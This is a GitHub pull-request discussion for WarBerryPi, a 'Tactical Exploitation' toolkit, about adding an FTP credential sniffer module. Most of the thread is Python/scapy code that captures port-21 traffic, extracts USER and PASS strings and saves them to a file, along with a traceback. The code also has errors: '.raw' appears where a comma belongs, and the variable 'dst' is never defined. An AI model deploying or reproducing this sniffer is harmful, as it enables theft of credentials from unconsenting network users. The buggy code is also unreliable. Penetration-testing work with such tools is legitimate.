search

secgroundzero / warberry

WarBerryPi - Tactical Exploitation
2.22k stars 288 forks source link

Add FTP sniffer module #72

Closed ghost closed 7 years ago

ghost commented 7 years ago

Adds a module to sniff FTP credentials for the value of expire variable using the interface iface variable. The original script is available on my Github.

secgroundzero commented 7 years ago

nice one mate. i will test and incorporate

secgroundzero commented 7 years ago

it works sometimes and sometimes it fails with the following error

 [ FTP CREDS SNIFFER MODULE ]

[] Sniffing for 20 seconds on interface wlan0 Traceback (most recent call last): File "warberry.py", line 313, in main() File "warberry.py", line 161, in main ftp_creds(iface, expire) File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 26, in ftp_creds sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface) File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 586, in sniff r = prn(p) File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 10, in ftpSniff user = re.findall('(?i)USER (.)'.raw) # username AttributeError: 'str' object has no attribute 'raw'

I changed your code as following

> 
> def ftpSniff(pkt):
>   if os.path.isfile('../Results/ftpcreds'):
>       print bcolors.WARNING + "[!] FTP Creds Results File Exists. Previous Results will be overwritten\n " + bcolors.ENDC
>   dest = pkt.getlayer(IP).dst
>   raw = pkt.sprintf('%Raw.load%')
>   user = re.findall('(?i)USER (.*)'.raw)  # username
>   passwd = re.findall('(?i)PASS (.*)'.raw)  # password
>   with open('../Results/ftpcreds', 'w') as ftpcreds:
>       if user:
>           print bcolors.OKGREEN + "[+] Detected FTP login to: " + str(dst) + bcolors.ENDC
>           print("[!] User account: " + str(user[0]))
>           ftpcreds.write(str(dst) + " " + str(user[0]))
>       elif passwd:
>           print("[!] Password: " + str(passwd[0]))
>           ftpcreds.write(str(dst) + " " + str(passwd[0]))
> 
> 
> def ftp_creds(iface, expire):
>   print " "
>   print bcolors.OKGREEN + "      [ FTP CREDS SNIFFER MODULE ]\n" + bcolors.ENDC
>   print '[*] Sniffing for %d seconds on interface %s' % (expire, iface)
>   sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface)
>   print bcolors.OKGREEN + "[+] " + bcolors.ENDC + "Capture Completed." + bcolors.ENDC + " Results saved at " + bcolors.OKGREEN + "../WarBerry/Results/ftpcreds!\n" + bcolors.ENDC
> 
>
ghost commented 7 years ago

Looks good to me :)

secgroundzero commented 7 years ago

passed on for later releases